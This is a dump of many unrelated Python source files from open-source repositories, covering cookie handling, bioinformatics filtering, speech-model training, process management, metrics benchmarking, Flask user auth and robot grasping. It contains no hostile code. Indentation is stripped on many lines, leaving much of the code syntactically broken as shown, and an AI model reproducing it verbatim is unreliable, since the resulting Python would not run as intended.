if _kv[0] == "Domain":
_dict["Domain"] = _kv[1]
elif _kv[0] == "Path":
_dict["Path"] = _kv[1]
elif _kv[0] == "max-age":
_dict["max-age"] = _kv[1]
elif _kv[0] == "Expires":
_dict["Expires"] = _kv[1]
elif _kv[0] == "httponly":
_dict["httponly"] = True
elif _kv[0] == "secure":
_dict["secure"] = True
else:
if len(_kv) > 1:
_kvs.update({_kv[0]: _kv[1]})
_dict['kvs'] = _kvs
        _dict.setdefault("Domain", self.domain)
return _dict
def load_cookies_from_file(self):
try:
with open(self.file, 'r') as f:
data = json.load(f)
except Exception as e:
if isinstance(e, FileNotFoundError) or isinstance(e, JSONDecodeError):
                print('Unable to read the data; the data has not been initialized!')
return {}
return data
def save_cookies_to_json(self, data):
try:
with open(self.file, 'w') as f:
json.dump(data, f, indent=2)
except Exception as e:
print(e)
| 2,508 |
galaxy_utils/sequence/scripts/fastq_filter.py
|
galaxyproject/sequence_utils
| 5 |
2172650
|
# <NAME>
import os
import shutil
import sys
from galaxy_utils.sequence.fastq import fastqReader, fastqWriter
def execfile(path, vars):
with open(path) as f:
code = compile(f.read(), path, 'exec')
exec(code, vars)
def main():
# Read command line arguments
input_filename = sys.argv[1]
script_filename = sys.argv[2]
output_filename = sys.argv[3]
additional_files_path = sys.argv[4]
input_type = sys.argv[5] or 'sanger'
    # Save script file for debugging/verification info later
os.mkdir(additional_files_path)
shutil.copy(script_filename, os.path.join(additional_files_path, 'debug.txt'))
i = None
reads_kept = 0
execfile(script_filename, globals())
# Dan, Others: Can we simply drop the "format=input_type" here since it is specified in reader.
# This optimization would cut runtime roughly in half (for my test case anyway). -John
writer = fastqWriter(path=output_filename, format=input_type)
reader = fastqReader(path=input_filename, format=input_type)
with writer, reader:
for i, fastq_read in enumerate(reader):
ret_val = fastq_read_pass_filter(fastq_read) # fastq_read_pass_filter defined in script_filename # NOQA
if ret_val:
writer.write(fastq_read)
reads_kept += 1
if i is None:
print("Your file contains no valid fastq reads.")
else:
print(f'Kept {reads_kept} of {i + 1} reads ({float(reads_kept) / float(i + 1) * 100.0:.2f}%).')
if __name__ == "__main__":
main()
| 1,562 |
PhoneProbes/eval_phones.py
|
archiki/ASR-Accent-Analysis
| 12 |
2171821
|
import torch
import torch.nn.functional as F
from torch import nn
from torch.utils.data import DataLoader
from torch.autograd import Variable
from model import PhoneNet
from data_loader import PhoneDataset
import argparse
import pdb
import time
from tqdm import tqdm
from torch.nn.parallel import DistributedDataParallel
import multiprocessing
import os
import json
from collections import OrderedDict  # used below to rebuild checkpoint keys without the "module." prefix
def custom_collate_fn(batch):
batch_size = len(batch)
out_batch = []
for x in range(batch_size):
sample = batch[x]
data = sample[0].to('cuda', non_blocking = True)
label = torch.tensor(sample[1])
label = label.to('cuda', non_blocking = True)
out_batch.append((data,label))
# print(type(batch[1]))
return out_batch
def eval_phones(test_path,rep_type, batch_size, num_epochs, inp_dim0, inp_dim1, model_path, hidden_dim = 500, all_gpu=False):
cuda = torch.cuda.is_available()
test_set = PhoneDataset(rep_type, test_path)
inp_dim = (inp_dim0, inp_dim1)
# torch.set_num_threads(32)
net = PhoneNet(inp_dim, hidden_dim)
criterion = nn.CrossEntropyLoss()
if(cuda):
net = net.cuda()
criterion = criterion.cuda()
net = torch.nn.DataParallel(net)
state_dict = torch.load(model_path)
try:
net.load_state_dict(state_dict)
except:
new_state_dict = OrderedDict()
for k, v in state_dict.items():
name = k[7:]
new_state_dict[name] = v
#net = torch.nn.DataParallel(net)
net.load_state_dict(new_state_dict)
valid_phones = ['ao', 'ae', 'r', 'eh', 't', 'b', 'aa', 'f', 'k', 'ng', 's', 'g', 'ow', 'er', 'l', 'th', 'z', 'aw', 'd', 'dh', 'sh', 'hh', 'iy', 'ch', 'm', 'ey', 'v', 'y', 'zh', 'jh', 'p', 'uw', 'ah', 'w', 'n', 'oy', 'ay', 'ih', 'uh']
phone_dict = {x:0 for x in valid_phones}
phone_accuracy = {x:0 for x in valid_phones}
    confusion_dict = {x: dict(phone_dict) for x in valid_phones}  # copy per phone so rows do not share one dict of counts
if(not all_gpu):
test_loader = DataLoader(test_set, batch_size=batch_size, shuffle=True, num_workers = multiprocessing.cpu_count()//4, pin_memory = True)
else:
test_loader = DataLoader(test_set, batch_size=batch_size, shuffle=True)
print('Loading finished')
for epoch in range(num_epochs):
train_loss = 0
test_loss = 0
train_total = 0
test_total = 0
train_correct = 0
test_correct = 0
#
net.eval()
# print("----------- %s Pass seconds --------------" % (time.time() - start_time))
for rep, label in test_loader:
rep = Variable(rep)
label = Variable(label)
if(cuda):
rep = rep.cuda()
label = label.cuda()
pred = net(rep)
tloss = criterion(pred, label)
test_loss += tloss.item()
_, predicted = torch.max(pred.data, 1)
gt = valid_phones[label]
y = valid_phones[predicted]
confusion_dict[gt][y] += 1
#test_total += label.size(0)
#test_correct += (predicted == label).sum().item()
#calculate loss
#calculate accuracy
accent = test_path.split('/')[-2]
with open('confusion_{}_{}.json'.format(rep_type, accent), 'w+') as f:
json.dump(confusion_dict, f)
parser = argparse.ArgumentParser(description='Take command line arguments')
parser.add_argument('--test_path',type=str)
parser.add_argument('--rep_type',type=str)
parser.add_argument('--batch_size',type=int)
parser.add_argument('--model_path', type= str)
args = parser.parse_args()
dim = {'spec':[161,1], 'conv':[1312,1], 'rnn_0': [1024,1], 'rnn_1': [1024,1], 'rnn_2': [1024, 1], 'rnn_3': [1024, 1], 'rnn_4': [1024,1]}
if __name__ == '__main__':
torch.manual_seed(0)
eval_phones(args.test_path, args.rep_type, args.batch_size, 1, dim[args.rep_type][0], dim[args.rep_type][1],args.model_path)
| 3,519 |
zarr-string-table/to_zarr.py
|
oeway/spatial-omics-hackathon-2021
| 0 |
2172747
|
import pandas as pd
import numpy as np
import zarr
from numcodecs import GZip
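# Store the "target" column of the reduced spots table in table.zarr as a fixed-length string dataset (gzip-compressed).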
def fixed_length():
tab = pd.read_csv("../spots_reduced.csv")
col = np.array([str(v) for v in tab["target"].values])
f = zarr.open("table.zarr")
f.create_dataset("fixed-length", data=col, chunks=(2048,), compressor=GZip())
def float_reference():
data = np.random.rand(2048).astype("float32")
f = zarr.open("table.zarr")
f.create_dataset("float", data=data, chunks=(512,), compressor=GZip())
float_reference()
| 525 |
src/sentry/api/serializers/models/commit.py
|
seukjung/sentry-custom
| 0 |
2173139
|
from __future__ import absolute_import
import six
from sentry.api.serializers import Serializer, register, serialize
from sentry.models import Commit, Repository
from sentry.api.serializers.models.release import get_users_for_commits
@register(Commit)
class CommitSerializer(Serializer):
def get_attrs(self, item_list, user):
author_objs = get_users_for_commits(item_list)
repositories = list(Repository.objects.filter(id__in=[c.repository_id for c in item_list]))
repositories = serialize(repositories)
repository_objs = {}
for repository in repositories:
repository_objs[repository['id']] = repository
result = {}
for item in item_list:
result[item] = {
'repository': repository_objs.get(six.text_type(item.repository_id), {}),
'user': author_objs.get(item.author_id, {})
}
return result
def serialize(self, obj, attrs, user):
d = {
'id': obj.key,
'message': obj.message,
'dateCreated': obj.date_added,
'repository': attrs.get('repository', {}),
'author': attrs.get('user', {})
}
return d
| 1,223 |
scripts/process_wrangler.py
|
hackcasual/ocupus
| 0 |
2171734
|
import shlex
import subprocess
import zmq
import time
from multiprocessing import Process, Value, Queue
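# ManagedProcess launches a command line inside a multiprocessing.Process, restarts it on exit if requested, and reports status over ZeroMQ.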
class ManagedProcess:
processes = []
def __init__(self, commandLine, category, name, shouldRestart):
self.commandLine = commandLine
self.category = category
self.name = name
self.shouldRestart = shouldRestart
self.shutdownFlag = Value('B', 0)
ManagedProcess.processes.append(self)
@staticmethod
def system_shutdown():
for p in ManagedProcess.processes:
p.shutdownFlag.value = 1
leftAlive = False
for p in ManagedProcess.processes:
try:
if p.managedProcess.is_alive():
leftAlive = True
except:
pass
if not leftAlive:
return
time.sleep(1.0)
for p in ManagedProcess.processes:
try:
p.managedProcess.terminate()
except:
pass
def start(self):
self.managedProcess = Process(target=self._run, args=(self.shutdownFlag,))
self.managedProcess.start()
def stop(self):
self.shutdownFlag.value = 1
self.managedProcess.join()
def _run(self, shutdown):
context = zmq.Context()
processControl = context.socket(zmq.SUB)
processControl.connect ("tcp://localhost:5554")
processControl.setsockopt(zmq.SUBSCRIBE, "process_control:%s:%s" % (self.category, self.name))
context = zmq.Context()
logger = context.socket(zmq.REQ)
logger.connect ("tcp://localhost:5550")
args = shlex.split(self.commandLine)
proc = subprocess.Popen(args)
while not shutdown.value:
events = processControl.poll(timeout=100)
if events != 0:
pass
retcode = proc.poll()
if retcode is None:
continue
logger.send_json({"type":"process_status", "data":{
"event": "exit",
"retcode": retcode,
"name": self.name,
"category": self.category,
"commandLine": self.commandLine
}})
logger.recv()
if self.shouldRestart:
time.sleep(0.1)
print("Restarting process %s:%s" % (self.category, self.name))
proc = subprocess.Popen(args)
logger.send_json({"type":"process_status", "data":{
"event": "restarting",
"name": self.name,
"category": self.category,
"commandLine": self.commandLine
}})
logger.recv()
else:
shutdown.value = 1
self._stop_child(proc)
def _stop_child(self, proc):
if proc.poll() is None:
proc.terminate()
for i in range(10):
if proc.poll() is not None:
return True
time.sleep(0.100)
print("Needed to kill the process")
proc.kill()
return False
return True
| 3,187 |
bench_bin.py
|
jpollack/statsite
| 629 |
2173103
|
import socket
import time
import random
import struct
NUM = 1024 * 1024
KEYS = ["test", "foobar", "zipzap"]
VALS = [32, 100, 82, 101, 5, 6, 42, 73]
BINARY_HEADER = struct.Struct("<BBHd")
BINARY_SET_HEADER = struct.Struct("<BBHH")
BIN_TYPES = {"kv": 1, "c": 2, "ms": 3, "set": 4}
def format(key, type, val):
"Formats a binary message for statsite"
key = str(key)
key_len = len(key) + 1
type_num = BIN_TYPES[type]
header = BINARY_HEADER.pack(170, type_num, key_len, float(val))
mesg = header + key + "\0"
return mesg
def format_set(key, val):
"Formats a binary set message for statsite"
key = str(key)
key_len = len(key) + 1
val = str(val)
val_len = len(val) + 1
type_num = BIN_TYPES["set"]
header = BINARY_SET_HEADER.pack(170, type_num, key_len, val_len)
mesg = "".join([header, key, "\0", val, "\0"])
return mesg
METS = []
for x in xrange(NUM):
key = random.choice(KEYS)
val = str(x) #random.choice(VALS)
METS.append(format_set(key, val))
s = socket.socket()
s.connect(("localhost", 8125))
start = time.time()
total = 0
while True:
current = 0
while current < len(METS):
msg = "".join(METS[current:current + 1024])
current += 1024
total += 1024
s.sendall(msg)
diff = time.time() - start
ops_s = total / diff
print "%0.2f sec\t - %.0f ops/sec" % (diff, ops_s)
| 1,400 |
coral_test.py
|
alsprogrammer/aaeon_up_board_setup
| 0 |
2171730
|
import numpy as np
import tflite_runtime.interpreter as tflite
interpreter = tflite.Interpreter('converted_model.tflite', experimental_delegates=[tflite.load_delegate('libedgetpu.so.1')])
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
data = [1, 1, 1]
input_data = np.float32([data])
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
print(interpreter.get_tensor(output_details[0]['index']).tolist()[0])
| 524 |
assemblyline/assemblyline/al/install/stages/install_70_signature_statistics.py
|
dendisuhubdy/grokmachine
| 46 |
2172375
|
from assemblyline.al.install import SiteInstaller
def install(alsi=None):
alsi = alsi or SiteInstaller()
alsi.milestone("Install signature statistics...")
alsi.sudo_install_file('assemblyline/al/install/etc/cron/al-signatures',
'/etc/cron.d/al-signatures')
alsi.milestone("Completed installation of signature statistics.")
if __name__ == '__main__':
install()
| 412 |
pynitrokey/nethsm/client/models/__init__.py
|
fayrlight/pynitrokey
| 0 |
2169509
|
# flake8: noqa
# import all models into this package
# if you have many models here with many references from one model to another this may
# raise a RecursionError
# to avoid this, import only the models that you directly need like:
# from pynitrokey.nethsm.client.model.pet import Pet
# or import this package, but before doing it, use:
# import sys
# sys.setrecursionlimit(n)
from pynitrokey.nethsm.client.model.backup_passphrase_config import BackupPassphraseConfig
from pynitrokey.nethsm.client.model.base64 import Base64
from pynitrokey.nethsm.client.model.decrypt_data import DecryptData
from pynitrokey.nethsm.client.model.decrypt_mode import DecryptMode
from pynitrokey.nethsm.client.model.decrypt_request_data import DecryptRequestData
from pynitrokey.nethsm.client.model.distinguished_name import DistinguishedName
from pynitrokey.nethsm.client.model.health_state_data import HealthStateData
from pynitrokey.nethsm.client.model.id import ID
from pynitrokey.nethsm.client.model.info_data import InfoData
from pynitrokey.nethsm.client.model.key_algorithm import KeyAlgorithm
from pynitrokey.nethsm.client.model.key_generate_request_data import KeyGenerateRequestData
from pynitrokey.nethsm.client.model.key_item import KeyItem
from pynitrokey.nethsm.client.model.key_list import KeyList
from pynitrokey.nethsm.client.model.key_mechanism import KeyMechanism
from pynitrokey.nethsm.client.model.key_mechanisms import KeyMechanisms
from pynitrokey.nethsm.client.model.key_private_data import KeyPrivateData
from pynitrokey.nethsm.client.model.key_public_data import KeyPublicData
from pynitrokey.nethsm.client.model.log_level import LogLevel
from pynitrokey.nethsm.client.model.logging_config import LoggingConfig
from pynitrokey.nethsm.client.model.network_config import NetworkConfig
from pynitrokey.nethsm.client.model.passphrase import Passphrase
from pynitrokey.nethsm.client.model.private_key import PrivateKey
from pynitrokey.nethsm.client.model.provision_request_data import ProvisionRequestData
from pynitrokey.nethsm.client.model.public_key import PublicKey
from pynitrokey.nethsm.client.model.random_data import RandomData
from pynitrokey.nethsm.client.model.random_request_data import RandomRequestData
from pynitrokey.nethsm.client.model.sign_data import SignData
from pynitrokey.nethsm.client.model.sign_mode import SignMode
from pynitrokey.nethsm.client.model.sign_request_data import SignRequestData
from pynitrokey.nethsm.client.model.switch import Switch
from pynitrokey.nethsm.client.model.system_info import SystemInfo
from pynitrokey.nethsm.client.model.system_state import SystemState
from pynitrokey.nethsm.client.model.system_update_data import SystemUpdateData
from pynitrokey.nethsm.client.model.time_config import TimeConfig
from pynitrokey.nethsm.client.model.unattended_boot_config import UnattendedBootConfig
from pynitrokey.nethsm.client.model.unlock_passphrase_config import UnlockPassphraseConfig
from pynitrokey.nethsm.client.model.unlock_request_data import UnlockRequestData
from pynitrokey.nethsm.client.model.user_data import UserData
from pynitrokey.nethsm.client.model.user_item import UserItem
from pynitrokey.nethsm.client.model.user_list import UserList
from pynitrokey.nethsm.client.model.user_passphrase_post_data import UserPassphrasePostData
from pynitrokey.nethsm.client.model.user_post_data import UserPostData
from pynitrokey.nethsm.client.model.user_role import UserRole
| 3,435 |
python/src/simulation.py
|
corinnaj/mysterious-murder
| 9 |
2172540
|
import random
from .agent import RandomAgent
from .evaluator import Evaluator
class Simulation:
def __init__(self, evaluator: Evaluator, agent=RandomAgent(), log=False):
self.evaluator = evaluator
self.agent = agent
self.log = log
def copy(self):
return Simulation(self.evaluator.copy())
def run(self, interactive=False, max_steps=100):
if interactive:
while True:
options = self.evaluator.step()
if len(options) < 1:
print('No options, exiting')
break
print('0: exit')
for i in range(len(options)):
print('{}: {}'.format(str(i + 1), str(options[i])))
number = int(input('Enter number: '))
if number == 0:
break
else:
options[number - 1].apply(self.evaluator)
else:
for _ in range(max_steps):
if not self.step():
return
def get_score_for_actor(self, actor):
# better look up the proper actor instance again, we might have
# diverged during copying
a = next(a for a in self.evaluator.actors if a == actor)
return a.calculate_score()
def count_alive_actors(self):
count = 0
for a in self.evaluator.actors:
if self.evaluator.state.contains('alive', [a]):
count += 1
return count
def check_stop(self, option):
return False
def get_actions_for_actor(self, actor):
options = self.evaluator.step()
return [option for option in options
if option.actors[0] == actor]
def whose_turn(self):
return random.choice(self.evaluator.actors)
def take_action(self, actor, rule_instance):
rule_instance.apply(self.evaluator, record=False, rewards=True)
def step(self):
next_actor = self.whose_turn()
option = self.agent.choose_action(next_actor, self)
# next_actor.update_scales(option.rule)
option.apply(self.evaluator, record=True, rewards=True)
self.random_witness(option)
if self.log:
print(option.story_print())
self.print_reward_state()
# self.print_causality(option)
# print(option.actors[0].relationship_to(option.actors[1],
# self.evaluator.state))
return not self.check_stop(option)
def random_witness(self, rule_instance):
if random.random() <= rule_instance.rule.witness_probability:
witness = random.choice([a for a in self.evaluator.actors
if a not in rule_instance.actors])
print("Witness! " + str(rule_instance) + " " + str(witness))
witness.witness(rule_instance)
def print_graph(self, view=True, show_all=False):
return self.evaluator.print_graph(view=view, show_all=show_all)
def print_causality(self, root):
self.evaluator.traverse_tree(root,
lambda rule: print(rule.story_print()))
def print_reward_state(self):
print('--------------------')
print(' \tsocial\tfulfilm\tsanity\tSCORE')
for c in self.evaluator.actors:
c.print_reward_state()
print('--------------------')
print()
| 3,436 |
exercise/admin.py
|
jkimbo/phishtray
| 0 |
2172878
|
from django.contrib import admin
from django import forms
from .models import Exercise, ExerciseKey, ExerciseEmail, ExerciseAttachment, ExerciseEmailReply, ExerciseURL, ExerciseWebPages
class ExerciseAdminForm(forms.ModelForm):
class Meta:
model = Exercise
exclude = []
readonly_fields = ['link',]
class ExerciseAdmin(admin.ModelAdmin):
form = ExerciseAdminForm
list_display = ('id', 'title', 'link', 'description', 'length_minutes')
list_filter = ['id']
admin.site.register(Exercise, ExerciseAdmin)
admin.site.register(ExerciseKey)
admin.site.register(ExerciseEmail)
admin.site.register(ExerciseEmailReply)
admin.site.register(ExerciseAttachment)
admin.site.register(ExerciseURL)
admin.site.register(ExerciseWebPages)
| 797 |
app/models.py
|
Zoctan/flask-api-seed
| 0 |
2172982
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import current_app
from itsdangerous import (
TimedJSONWebSignatureSerializer as Serializer, BadSignature, SignatureExpired)
from passlib.apps import custom_app_context as pwd_context
from app import db
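# Permission bit flags; a role's permission mask is built by OR-ing these together (see UserRole.insert_roles).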
class Permission:
COMMENT = 0x02
WRITE_ARTICLES = 0x04
MODERATE_COMMENTS = 0x08
ADMIN = 0x80
class UserRole(db.Model):
__tablename__ = 'role'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
default = db.Column(db.Boolean, default=False, index=True)
permissions = db.Column(db.Integer)
user = db.relationship('User', backref='UserRole', lazy='dynamic', cascade='all, delete-orphan')
@staticmethod
def insert_roles():
roles = {
'user': (Permission.COMMENT |
Permission.WRITE_ARTICLES, True),
'admin': (0xff, False)
}
for r in roles:
role = UserRole.query.filter_by(name=r).first()
if role is None:
role = UserRole(name=r)
role.permissions = roles[r][0]
role.default = roles[r][1]
db.session.add(role)
db.session.commit()
def __repr__(self):
        return '<UserRole(name={}, permissions={})>'.format(self.name, self.permissions)
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.Unicode(32, collation='utf8_bin'), nullable=False, unique=True, index=True)
password_hash = db.Column(db.Unicode(256, collation='utf8_bin'), nullable=False)
email = db.Column(db.Unicode(20, collation='utf8_bin'))
    role_id = db.Column(db.Integer, db.ForeignKey('role.id'))  # foreign key to UserRole; referenced in __init__ below
    role = db.relationship('UserRole', backref='User', uselist=False, lazy='select')
def __repr__(self):
return '<User(username={})>'.format(self.username)
def __init__(self, **kwargs):
super(User, self).__init__(**kwargs)
if self.role_id is None:
if self.username == 'admin':
role = UserRole.query.filter_by(permissions=0xff).first()
else:
role = UserRole.query.filter_by(default=True).first()
self.role_id = role.id
def operation(self, permissions):
return self.role_id is not None and (self.role.permissions & permissions) == permissions
@property
def password(self):
raise AttributeError('password is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = pwd_context.hash(password)
def verify_password(self, password):
return pwd_context.verify(password, self.password_hash)
def generate_auth_token(self, expiration=3600):
s = Serializer(current_app.config['SECRET_KEY'], expires_in=expiration)
return s.dumps({'id': self.id})
@staticmethod
def verify_auth_token(token):
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except SignatureExpired:
return None # valid token, but expired
except BadSignature:
return None # invalid token
user = User.query.get(data['id'])
return user
def to_json(self):
json = {
'id': self.id,
'username': self.username,
'email': self.email
}
return json
class AnonymousUser(User):
def operation(self, permissions):
return False
| 3,484 |
common/ftp/models/user/restp.py
|
ithollie/PayBits
| 0 |
2171030
|
from common.database import Database
from models.passrest.mail.sendemail import Mail
from models import constants as UserConstants
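# Restp looks up a user by e-mail and mails out a password-reset link built from the user's e-mail and id.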
class Restp(object):
def __init__(self,email):
self.email = email
self.netmail = self.sendmail(self.email,self.json()['url'],self.json()['subject'])
@staticmethod
def checkmail(email):
data = Database.find_one(UserConstants.COLLECTION,{"email":email})
if data is not None:
return data
else:
return None;
@staticmethod
def checkmliame(email):
data = Database.find(UserConstants.COLLECTION,{})
for datas in data:
dat = datas["email"]
if dat == email:
return email
@staticmethod
def Update(emailnow,emailupdated):
if emailnow is not None:
Database.updates(UserConstants.COLLECTION,{"email":emailnow},{"$set": {"email":emailupdated}} )
@classmethod
def check_mail(self,email):
namail = self.checkmliame(email)
data = Database.find_one(UserConstants.COLLECTION,{"email":namail})
if data is not None:
return data
else:
return False
def Valid(self):
        credential={"email":self.check_mail(self.email)['email'],"id":self.check_mail(self.email)['_id']}
        return credential
@staticmethod
def sendmail(email,url,subject):
mail = Mail(email,url,subject)
if mail is not None:
mail.send()
def json(self):
return {"url":"http://127.0.0.1:8000/change_system_password/change_users_password/"+self.Valid()['email']+"/"+self.Valid()['id'],"subject":"please rest password"}
| 1,477 |
src/models/private/wavenet.py
|
trungd/speech-recognition
| 1 |
2171109
|
# Compatibility imports
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time, os
from .base import BaseModel
import tensorflow as tf
from six.moves import xrange as range
num_units = 320 # Number of units in the LSTM cell
# Accounting the 0th indice + space + blank label = 28 characters
# Hyper-parameters
num_epochs = 10000
num_hidden = 50
num_layers = 3
tf.logging.set_verbosity(tf.logging.INFO)
tf.logging.info('test')
# val_inputs, val_seq_len, val_targets = audio_processor.next_train_batch(1, 1)
class WavenetModel(BaseModel):
def _build_graph(self):
# generate a SparseTensor required by ctc_loss op.
indices = tf.where(tf.not_equal(self.target_labels, tf.constant(-1, tf.int32)))
values = tf.gather_nd(self.target_labels, indices)
shape = tf.shape(self.target_labels, out_type=tf.int64)
self.targets = tf.SparseTensor(indices, values, shape)
# Defining the cell
# cells = [tf.contrib.rnn.LSTMCell(num_units) for _ in range(num_layers)]
# stack = tf.contrib.rnn.MultiRNNCell(cells)
# The second output is the last state and we will no use that
# outputs, _ = tf.nn.dynamic_rnn(stack, self.inputs, self.input_seq_len, dtype=tf.float32)
cells_fw = [tf.contrib.rnn.LSTMCell(num_units) for _ in range(num_layers)]
cells_bw = [tf.contrib.rnn.LSTMCell(num_units) for _ in range(num_layers)]
outputs, _, _ = tf.contrib.rnn.stack_bidirectional_dynamic_rnn(cells_fw,
cells_bw, self.inputs,
sequence_length=self.input_seq_len,
dtype=tf.float32)
# Reshaping to apply the same weights over the timesteps
# outputs = tf.reshape(outputs, [-1, num_hidden])
logits = tf.layers.dense(outputs, self.hparams.num_classes)
# Reshaping back to the original shape
# logits = tf.reshape(logits, [hparams.batch_size, -1, hparams.num_classes])
# Time major
logits = tf.transpose(logits, (1, 0, 2))
self.logits = logits
loss = tf.nn.ctc_loss(self.targets, logits, self.input_seq_len, ignore_longer_outputs_than_inputs=True)
self.loss = tf.reduce_mean(loss)
self.decoded, log_prob = tf.nn.ctc_greedy_decoder(logits, self.input_seq_len)
# self.decoded, log_prob = tf.nn.ctc_beam_search_decoder(logits, self.input_seq_len)
self.dense_decoded = tf.sparse_tensor_to_dense(self.decoded[0], default_value=-1)
# label error rate
self.ler = tf.reduce_mean(tf.edit_distance(tf.cast(self.decoded[0], tf.int32),
self.targets))
def train(self, sess):
# inputs, targets = sess.run([self.inputs, self.targets])
batch_lost, _, self.summary, _ler, dense_decoded, \
inputs, labels, inputs_len, labels_len, logits = \
sess.run([
self.loss,
self.update,
self.train_summary,
self.ler,
self.dense_decoded,
self.inputs, self.target_labels, self.input_seq_len, self.target_seq_len, self.logits
])
return batch_lost, _ler
def eval(self, sess):
target_labels, cost, ler, decoded = \
sess.run([
self.target_labels,
self.cost,
self.ler,
self.dense_decoded
])
return target_labels, cost, ler, decoded
| 3,704 |
contest/abc143/C.py
|
mola1129/atcoder
| 0 |
2171947
|
n = int(input())
s = input()
ans = 0
for i in range(1, n):
if s[i] != s[i - 1]:
ans += 1
print(ans + 1)
| 116 |
scripts/panda_grasp.py
|
runeg96/vgn
| 92 |
2172841
|
#!/usr/bin/env python
"""
Open-loop grasp execution using a Panda arm and wrist-mounted RealSense camera.
"""
import argparse
from pathlib import Path
import cv_bridge
import franka_msgs.msg
import geometry_msgs.msg
import numpy as np
import rospy
import sensor_msgs.msg
from vgn import vis
from vgn.experiments.clutter_removal import State
from vgn.detection import VGN
from vgn.perception import *
from vgn.utils import ros_utils
from vgn.utils.transform import Rotation, Transform
from vgn.utils.panda_control import PandaCommander
# tag lies on the table in the center of the workspace
T_base_tag = Transform(Rotation.identity(), [0.42, 0.02, 0.21])
round_id = 0
class PandaGraspController(object):
def __init__(self, args):
self.robot_error = False
self.base_frame_id = rospy.get_param("~base_frame_id")
self.tool0_frame_id = rospy.get_param("~tool0_frame_id")
self.T_tool0_tcp = Transform.from_dict(rospy.get_param("~T_tool0_tcp")) # TODO
self.T_tcp_tool0 = self.T_tool0_tcp.inverse()
self.finger_depth = rospy.get_param("~finger_depth")
self.size = 6.0 * self.finger_depth
self.scan_joints = rospy.get_param("~scan_joints")
self.setup_panda_control()
self.tf_tree = ros_utils.TransformTree()
self.define_workspace()
self.create_planning_scene()
self.tsdf_server = TSDFServer()
self.plan_grasps = VGN(args.model, rviz=True)
rospy.loginfo("Ready to take action")
def setup_panda_control(self):
rospy.Subscriber(
"/franka_state_controller/franka_states",
franka_msgs.msg.FrankaState,
self.robot_state_cb,
queue_size=1,
)
rospy.Subscriber(
"/joint_states", sensor_msgs.msg.JointState, self.joints_cb, queue_size=1
)
self.pc = PandaCommander()
self.pc.move_group.set_end_effector_link(self.tool0_frame_id)
def define_workspace(self):
z_offset = -0.06
t_tag_task = np.r_[[-0.5 * self.size, -0.5 * self.size, z_offset]]
T_tag_task = Transform(Rotation.identity(), t_tag_task)
self.T_base_task = T_base_tag * T_tag_task
self.tf_tree.broadcast_static(self.T_base_task, self.base_frame_id, "task")
rospy.sleep(1.0) # wait for the TF to be broadcasted
def create_planning_scene(self):
# collision box for table
msg = geometry_msgs.msg.PoseStamped()
msg.header.frame_id = self.base_frame_id
msg.pose = ros_utils.to_pose_msg(T_base_tag)
msg.pose.position.z -= 0.01
self.pc.scene.add_box("table", msg, size=(0.6, 0.6, 0.02))
rospy.sleep(1.0) # wait for the scene to be updated
def robot_state_cb(self, msg):
detected_error = False
if np.any(msg.cartesian_collision):
detected_error = True
for s in franka_msgs.msg.Errors.__slots__:
if getattr(msg.current_errors, s):
detected_error = True
if not self.robot_error and detected_error:
self.robot_error = True
rospy.logwarn("Detected robot error")
def joints_cb(self, msg):
self.gripper_width = msg.position[7] + msg.position[8]
def recover_robot(self):
self.pc.recover()
self.robot_error = False
rospy.loginfo("Recovered from robot error")
def run(self):
vis.clear()
vis.draw_workspace(self.size)
self.pc.move_gripper(0.08)
self.pc.home()
tsdf, pc = self.acquire_tsdf()
vis.draw_tsdf(tsdf.get_grid().squeeze(), tsdf.voxel_size)
vis.draw_points(np.asarray(pc.points))
rospy.loginfo("Reconstructed scene")
state = State(tsdf, pc)
grasps, scores, planning_time = self.plan_grasps(state)
vis.draw_grasps(grasps, scores, self.finger_depth)
rospy.loginfo("Planned grasps")
if len(grasps) == 0:
rospy.loginfo("No grasps detected")
return
grasp, score = self.select_grasp(grasps, scores)
vis.draw_grasp(grasp, score, self.finger_depth)
rospy.loginfo("Selected grasp")
self.pc.home()
label = self.execute_grasp(grasp)
rospy.loginfo("Grasp execution")
if self.robot_error:
self.recover_robot()
return
if label:
self.drop()
self.pc.home()
def acquire_tsdf(self):
self.pc.goto_joints(self.scan_joints[0])
self.tsdf_server.reset()
self.tsdf_server.integrate = True
for joint_target in self.scan_joints[1:]:
self.pc.goto_joints(joint_target)
self.tsdf_server.integrate = False
tsdf = self.tsdf_server.low_res_tsdf
pc = self.tsdf_server.high_res_tsdf.get_cloud()
return tsdf, pc
def select_grasp(self, grasps, scores):
# select the highest grasp
heights = np.empty(len(grasps))
for i, grasp in enumerate(grasps):
heights[i] = grasp.pose.translation[2]
idx = np.argmax(heights)
grasp, score = grasps[idx], scores[idx]
# make sure camera is pointing forward
rot = grasp.pose.rotation
axis = rot.as_matrix()[:, 0]
if axis[0] < 0:
grasp.pose.rotation = rot * Rotation.from_euler("z", np.pi)
return grasp, score
def execute_grasp(self, grasp):
T_task_grasp = grasp.pose
T_base_grasp = self.T_base_task * T_task_grasp
T_grasp_pregrasp = Transform(Rotation.identity(), [0.0, 0.0, -0.05])
T_grasp_retreat = Transform(Rotation.identity(), [0.0, 0.0, -0.05])
T_base_pregrasp = T_base_grasp * T_grasp_pregrasp
T_base_retreat = T_base_grasp * T_grasp_retreat
self.pc.goto_pose(T_base_pregrasp * self.T_tcp_tool0, velocity_scaling=0.2)
self.approach_grasp(T_base_grasp)
if self.robot_error:
return False
self.pc.grasp(width=0.0, force=20.0)
if self.robot_error:
return False
self.pc.goto_pose(T_base_retreat * self.T_tcp_tool0)
# lift hand
T_retreat_lift_base = Transform(Rotation.identity(), [0.0, 0.0, 0.1])
T_base_lift = T_retreat_lift_base * T_base_retreat
self.pc.goto_pose(T_base_lift * self.T_tcp_tool0)
if self.gripper_width > 0.004:
return True
else:
return False
def approach_grasp(self, T_base_grasp):
self.pc.goto_pose(T_base_grasp * self.T_tcp_tool0)
def drop(self):
self.pc.goto_joints(
[0.678, 0.097, 0.237, -1.63, -0.031, 1.756, 0.931], 0.2, 0.2
)
self.pc.move_gripper(0.08)
class TSDFServer(object):
def __init__(self):
